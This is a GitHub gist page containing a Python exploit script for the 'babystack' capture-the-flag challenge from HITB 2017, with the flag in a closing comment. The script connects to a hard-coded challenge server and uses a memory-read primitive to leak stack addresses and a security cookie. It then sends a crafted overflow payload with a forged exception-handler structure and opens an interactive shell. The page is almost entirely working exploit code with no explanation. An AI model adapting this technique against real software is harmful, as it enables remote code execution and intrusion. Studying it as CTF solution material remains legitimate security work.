Skip to content

Instantly share code, notes, and snippets.

@Mipu94

Mipu94/pwn.py

Last active August 25, 2017 09:36
Show Gist options
  • Save Mipu94/c1617db53d6dfceb6d6c32073fd2fe55 to your computer and use it in GitHub Desktop.
Save Mipu94/c1617db53d6dfceb6d6c32073fd2fe55 to your computer and use it in GitHub Desktop.
Download ZIP
babystack-hitb2017.py
Raw
pwn.py
from customlibpwn import *
def p(m):
return pack("<I", m)
def u(m):
return unpack("<I", m)[0]
########################################################
# PWN! PWN! PWN!
########################################################
def view_value(addr):
send("yes\n")
recvu("Where do you want to know")
send(str(addr)+"\n")
data = recvu("Do you want to know more?")
i = data.find("is ")+3
data= data[i:]
i = data.find("\r\n")
data= data[0:i]
return int(data,16)
def doexploit():
#sock("192.168.177.1",4000,64)
sock("47.74.133.139",20004,64)
data=recvu("Do you want to know more?",1)
i=data.find("0x")
data= data[i:]
j = data.find("\r\n")
data=data[0:j]
stack= int(data,16)
print hex(stack)
#base = 0x161000
base=0xd91000
v1= view_value(stack+0x8c)
v2=view_value(v1)
v3=view_value(v2)
v3=view_value(v3+4)
cookie = view_value(base+0x3004)
print hex(cookie)
send("noo\n")
fake=cookie^(stack+4)
fake2=cookie^(stack-0x44)
payload=p32(0xFFFFFFE4)+p32(0)+p32( 0xFFFFFF20)+p32(0)+p32(0xFFFFFF20)+p32(base+0x0348)+p32(base+0x038D)+p32(0)*2
payload+=p32(0xcc)
payload+= ((0x8c-len(payload))/4)*p32(stack)
payload+=p32(stack+0x8c+0x14)+p32(base+0x460)+p32(fake)+p32(0x0)+p32(fake2)
payload+= p32(0xffffffff)
payload+= p32(v3)
payload+="\n"
send(payload,1)
recvu("Do you want to know more?")
send("yes\n")
recvu("Where do you want to know")
raw_input()
send("123\n")
telnet()
doexploit()
#hitb{W0W_y0u_kn0w_sc0p3_t4b13}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment